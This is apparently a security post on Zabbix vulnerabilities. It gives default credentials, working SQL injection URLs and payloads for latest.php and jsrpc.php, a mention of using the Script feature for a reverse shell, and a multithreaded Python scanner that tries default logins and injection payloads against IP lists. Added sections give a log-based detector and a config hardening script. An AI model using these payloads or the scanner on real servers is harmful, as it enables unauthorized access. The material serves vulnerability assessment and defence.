Zabbix Vulnerability Roundup

1. Zabbix

Zabbix is an enterprise-grade, open-source solution that provides distributed system monitoring and network monitoring through a web interface. It can monitor a wide range of network parameters to keep server systems running safely, and it offers a flexible notification mechanism so that administrators can quickly locate and resolve problems.

2. Zabbix vulnerabilities

I. Weak passwords

WeakPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]

II. SQL injection

(1)

Title: SQL injection via the toggle_ids[] parameter of latest.php

Attack precondition: requires login

Impact: can obtain system privileges

URL and payload:

"""
http://a.b.c.d/latest.php?output=ajax&sid=<last 16 characters of the session id after login>&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""

(2)

Title: SQL injection via the profileIdx2 parameter of jsrpc.php

Attack precondition: no login required; alternatively, after logging in, the sid and cookie of a high-privilege account can be substituted in

Impact: the usual SQL injection impact

URL and payload:

"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""

(3)

Title: other SQL injection flaws: the itemid and periods parameters of chart_bar.php, and the applications parameter of httpmon.php

Attack precondition: unknown

Impact: unknown

URL and payload: try the usual SQL injection payloads
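From the defender's side, the two injection points above have a convenient property: profileIdx2 and toggle_ids[] are integer ids, so any request in which they carry anything but digits is worth an alert. The following detection script is an added example and is not part of the original post. It parses common-log-format web server lines (the sample lines are constructed, with hypothetical hosts), extracts the parameters the post names for each PHP script, and flags values that are not plain integers, rating them higher when SQL fragments are present. Treating itemid, periods and applications as integer ids is an assumption made here for chart_bar.php and httpmon.php; profileIdx2 and toggle_ids[] genuinely are.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (hypothetical hosts, not taken from the post).
# Lines 1 and 3 carry the two payload shapes shown above; lines 2 and 4 are the
# same requests with ordinary numeric ids.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2016:05:06:32 +0000] "GET /jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true HTTP/1.1" 200 512
10.0.0.6 - - [17/Aug/2016:05:07:01 +0000] "GET /jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=2&updateProfile=true HTTP/1.1" 200 512
10.0.0.7 - - [17/Aug/2016:05:08:10 +0000] "GET /latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);%20select%20*%20from%20users%20where%20(1=1 HTTP/1.1" 200 90
10.0.0.8 - - [17/Aug/2016:05:09:00 +0000] "GET /latest.php?output=ajax&sid=0bcd4ade648214dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385 HTTP/1.1" 200 90
"""

# Parameters named in the post, keyed by script. profileIdx2 and toggle_ids[] are
# integer ids in Zabbix; treating itemid/periods/applications as integer ids too is
# an assumption made for this example.
WATCHED_PARAMS = {
    "jsrpc.php": {"profileIdx2"},
    "latest.php": {"toggle_ids[]"},
    "chart_bar.php": {"itemid", "periods"},
    "httpmon.php": {"applications"},
}

# Fragments that have no business inside an integer id (checked on the
# lower-cased, URL-decoded value).
SQL_MARKERS = ("updatexml(", "select ", " or ", "'", '"', ")", "#", "--")

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs. Done by hand
    rather than with parse_qs, whose separator handling changed across Python versions."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyse_line(line):
    """Return one finding dict per watched parameter whose value is not a plain integer."""
    match = LOG_LINE.match(line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    script = url.path.rsplit("/", 1)[-1]
    watched = WATCHED_PARAMS.get(script)
    if not watched:
        return []
    findings = []
    for name, value in parse_query(url.query):
        if name not in watched or value.isdigit():
            continue
        lowered = value.lower()
        markers = [m for m in SQL_MARKERS if m in lowered]
        findings.append({
            "ip": match.group("ip"),
            "time": match.group("ts"),
            "script": script,
            "param": name,
            "value": value,
            "markers": markers,
            # a non-integer id containing SQL fragments is a strong signal; without
            # them it still deserves a look but may just be a broken client
            "severity": "high" if markers else "low",
        })
    return findings


def scan_log(text):
    """Run analyse_line over every line of an access log and collect the findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(analyse_line(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(severity)s %(ip)s %(script)s %(param)s=%(value)r markers=%(markers)s" % f)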

III. OS command injection / execution:

(1) After logging in with a weak password, the built-in Zabbix Script feature can run system commands, which can be used to get a reverse shell and so on.

(2) Protection:

  # Do not set AllowRoot=1, so that neither the agent nor the server starts as root.

  # Forbid system.run on the agent: do not set EnableRemoteCommands=1.

  # Patch promptly.
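The two configuration settings above are easy to audit mechanically. The script below is an added example, not part of the original post: it parses the Key=Value format that zabbix_agentd.conf and zabbix_server.conf use, reports AllowRoot=1 and EnableRemoteCommands=1, and rewrites them to 0 while leaving every other line untouched. Both parameters default to 0 when absent, so an unset key is treated as safe. The sample configuration is constructed with hypothetical addresses and host names.

```python
# Constructed sample zabbix_agentd.conf fragment (hypothetical values, not from
# the post) with both of the settings the post warns about switched on.
SAMPLE_AGENT_CONF = """\
# zabbix_agentd.conf (constructed sample)
Server=10.0.0.1
ServerActive=10.0.0.1
Hostname=web-01
AllowRoot=1
EnableRemoteCommands=1
"""

# Setting -> (dangerous value, advice). Both default to 0 when the key is absent,
# so a missing key is not reported.
RISKY_SETTINGS = {
    "AllowRoot": ("1", "daemon may run as root; set AllowRoot=0 and run under the zabbix user"),
    "EnableRemoteCommands": ("1", "agent executes system.run sent by the server; set EnableRemoteCommands=0"),
}


def parse_conf(text):
    """Parse Zabbix's Key=Value format: '#' lines are comments, a later key wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def audit_conf(text):
    """Return [(key, advice)] for every risky setting that is switched on."""
    settings = parse_conf(text)
    return [(key, advice) for key, (bad, advice) in RISKY_SETTINGS.items()
            if settings.get(key) == bad]


def harden_conf(text):
    """Rewrite the risky settings to 0 in place and keep everything else verbatim."""
    out = []
    for raw in text.splitlines():
        key, sep, _ = raw.strip().partition("=")
        key = key.strip()
        if sep and key in RISKY_SETTINGS and not raw.lstrip().startswith("#"):
            out.append("%s=0" % key)
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for key, advice in audit_conf(SAMPLE_AGENT_CONF):
        print("[!] %s: %s" % (key, advice))
    print(harden_conf(SAMPLE_AGENT_CONF))
```

Point audit_conf at the contents of a real agent or server configuration file to get the same report; harden_conf is a one-shot rewrite, so review its output before replacing the file and restart the daemon afterwards.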

IV. A Python check script I wrote myself (if anything is wrong, call me out):

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
"""

# import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser

# global variables
ZabbixTarget = None  # target ip address
ZabbixFile = None    # file with one target ip address per line
BlackList = [        # strings that mean the login did NOT succeed
    'incorrect',
    '<!-- Login Form -->'
]
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'

# global config set
logging.basicConfig(level=logging.INFO, format='%(message)s')


# global function defines:
def Config_Init():
    """
    Prepend "http://" to each ip address to build the target url list.
    """
    if ZabbixTarget:
        return ["http://%s" % ZabbixTarget]
    elif ZabbixFile:
        targetlist = []
        with open(ZabbixFile, "r") as fr:
            for ip in fr:
                ip = ip.strip()
                if ip:
                    targetlist.append("http://%s" % ip)
        return targetlist
    else:
        return []


def get_post_data(page_content):
    """
    Collect every named <input> with a value from the login page as POST data,
    so hidden form fields are sent along with the credentials.
    """
    postdata = {}
    soup = BeautifulSoup(page_content, "html.parser")
    for inputparameter in soup.find_all('input'):
        if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
            postdata[inputparameter['name']] = inputparameter['value']
    return postdata


def report_file_allinone():
    """Merge the per-thread result files into one CSV report and delete them."""
    vulnlist = []
    for parents, dirs, filenames in os.walk("./"):
        for filename in filenames:
            if filename.find("zabbix_vulnscan_result") >= 0:
                path = os.path.join(parents, filename)
                with open(path, "r") as fr:
                    vulnlist.extend(fr.readlines())
                os.remove(path)
    with open("zabbix_vuln_report_%s.csv" % str(datetime.date.today()), "w") as fw:
        fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
        for line in vulnlist:
            fw.write(line)


# Zabbix Scan Class Defines
class ZabbixScan:
    def __init__(self, targetlist):
        """
        #class column init!
        VulnExpPHPFile:
        //0-login-weakpassword
        //1-httpmon.php parameter->applications
        //2-chart_bar.php parameter->itemid
        //3-jsrpc.php parameter->profileIdx2
        //4-latest.php parameter->toggle_ids[]
        //5-OS_Injection->When you login the system you can run your scripts!
        TestTarget:
        //0-login-weakpassword
        //1-jsrpc.php
        //2-latest.php
        """
        self._weakpassword = [{"username": "Admin", "password": "zabbix"},
                              {"username": "admin", "password": "zabbix"},
                              {"username": "guest", "password": ""}]  # default password dictionary
        self._targetlist = targetlist  # targets waiting for scan
        self._size = len(self._targetlist)  # number of scan targets
        self._sqlinjectionurl1_vulnlist = []
        self._sqlinjectionurl2_vulnlist = []
        self._login_weakpassword_vulnlist = []
        self._login_weakpassword_safelist = []

    def __len__(self):
        """return size of targetlist"""
        return self._size

    def _scan_default_password_login(self):
        for authinfo in self._weakpassword:
            user = authinfo["username"]
            pswd = authinfo["password"]
            for target in self._targetlist:
                logging.info("[*] Target:%s Payload:%s" % (str(target), str(authinfo)))
                headers = {'User-Agent': USER_AGENT}
                request = requests.session()
                try:
                    response = request.get(target, headers=headers, timeout=3)
                except Exception:
                    self._login_weakpassword_safelist.append(target)
                    continue
                if response.status_code != 200:
                    self._login_weakpassword_safelist.append(target)
                    continue
                postdata = get_post_data(response.text)
                headers["Referer"] = target
                postdata["user"] = user
                postdata["password"] = pswd
                try:
                    response = request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
                except Exception:
                    self._login_weakpassword_safelist.append(target)
                    continue
                # a logged-in dashboard contains "chkbxRange.init();" and none of the
                # login-failure markers from BlackList
                if "chkbxRange.init();" in response.text and \
                        not any(flagstring in response.text for flagstring in BlackList):
                    self._login_weakpassword_vulnlist.append((target, user, pswd))
                else:
                    self._login_weakpassword_safelist.append(target)
                request.close()

    def _sqlinjectionurl1_scan(self):
        logging.info("[*] latest.php sqlinjection scan!")
        for vulntarget in self._login_weakpassword_vulnlist:
            target, user, pswd = vulntarget
            request = requests.session()
            headers = {'User-Agent': USER_AGENT}
            try:
                response = request.get(target, headers=headers, timeout=3)
            except Exception:
                continue
            postdata = get_post_data(response.text)
            postdata["user"] = user
            postdata["password"] = pswd
            headers["Referer"] = target
            try:
                response = request.post(target + "/index.php", headers=headers, data=postdata, timeout=3)
            except Exception:
                continue
            # the session cookie jar holds the cookie set during login
            cookievalues = list(request.cookies.values())
            if not cookievalues:
                request.close()
                continue
            sessionid = cookievalues[0][-16:]  # sid = last 16 characters of the session id
            # "%%" is a literal percent sign: only the sid is a format directive
            scanurl = target + "/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%%^&*%%22%%27()-*#" % str(sessionid)
            try:
                response = request.get(scanurl, timeout=20)
            except Exception:
                request.close()
                continue
            if "SQL syntax" in response.text:
                self._sqlinjectionurl1_vulnlist.append(vulntarget)
            request.close()

    def _sqlinjectionurl2_scan(self):
        logging.info("[*] jsrpc.php sqlinjection scan!")
        for vulntarget in self._targetlist:
            scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
            headers = {'User-Agent': USER_AGENT}
            try:
                response = requests.get(scanurl, headers=headers, timeout=20)
            except Exception:
                continue
            # the injected md5(0x11) shows up in the XPath error message when vulnerable
            if "ed733b8d10be255eceba344d533586" in response.text:
                self._sqlinjectionurl2_vulnlist.append(vulntarget)

    def scan_run(self):
        self._scan_default_password_login()
        self._sqlinjectionurl1_scan()
        self._sqlinjectionurl2_scan()


class scanthread(threading.Thread):
    def __init__(self, threadname, targetlist):
        threading.Thread.__init__(self, name=threadname)
        self.scanner = ZabbixScan(targetlist)
        self.targetlist = targetlist

    def _create_csv(self):
        scantime = str(datetime.datetime.now())
        with open("zabbix_vulnscan_result_%s_%s" % (str(time.time()), str(self.name)), "w") as fw:
            for vuln in self.scanner._login_weakpassword_vulnlist:
                target = vuln[0].split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "weakpassword", scantime))
            for vuln in self.scanner._sqlinjectionurl1_vulnlist:
                target = vuln[0].split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "latest.php-SQLI", scantime))
            for vuln in self.scanner._sqlinjectionurl2_vulnlist:  # entries are plain url strings
                target = vuln.split("http://")[-1]
                fw.write("%s,%s,%s\n" % (target, "jsrpc.php-SQLI", scantime))

    def run(self):
        self.scanner.scan_run()
        self._create_csv()


if __name__ == "__main__":
    logging.info("[+]*****************************************************************[+]")
    logging.info("Zabbix Scan Init!")
    parser = OptionParser()
    parser.add_option("-i", "--iptarget", dest="iptarget", help="Target IP address!")
    parser.add_option("-f", "--iptargetfile", dest="iptargetfile", help="Target IPs file!")
    parser.add_option("-t", "--threadnum", dest="threadnum", help="Number of Added Threads to Scan!")
    (options, args) = parser.parse_args()
    if not options.iptarget and not options.iptargetfile:
        logging.error("[-] Target parameters error!")
        sys.exit(0)
    try:
        options.threadnum = 1 if not options.threadnum else int(options.threadnum)
        if options.threadnum < 1:
            raise ValueError("threadnum must be >= 1")
    except ValueError:
        logging.error("[-] Threadnum parameter error!")
        sys.exit(0)
    ZabbixTarget, ZabbixFile = options.iptarget, options.iptargetfile
    logging.info("[+] Scan Config Init!")
    targetlist = Config_Init()
    targetsize = len(targetlist)
    logging.info("[+] Scan Target Number:%s" % str(targetsize))
    logging.info("[+] Scan Threads Init")
    # integer division; at least one target per thread so the slicing always advances
    threadtargetsize = max(1, targetsize // options.threadnum)
    threadlist = []
    for nameflag, devidestart in enumerate(range(0, targetsize, threadtargetsize)):
        threadname = "scan-thread-%s" % str(nameflag)
        threadtargetlist = targetlist[devidestart:devidestart + threadtargetsize]
        threadlist.append(scanthread(threadname, threadtargetlist))

    logging.info("[+] Scan Thread Start!")
    for thread in threadlist:
        thread.start()
        time.sleep(2)
        logging.info("[+] %s --Start!" % thread.name)
    for thread in threadlist:
        thread.join()
    logging.info("[+] Scan Finished!")
    logging.info("[+] Report Creating!")
    report_file_allinone()
    logging.info("[+] Report Create!")
    sys.exit(0)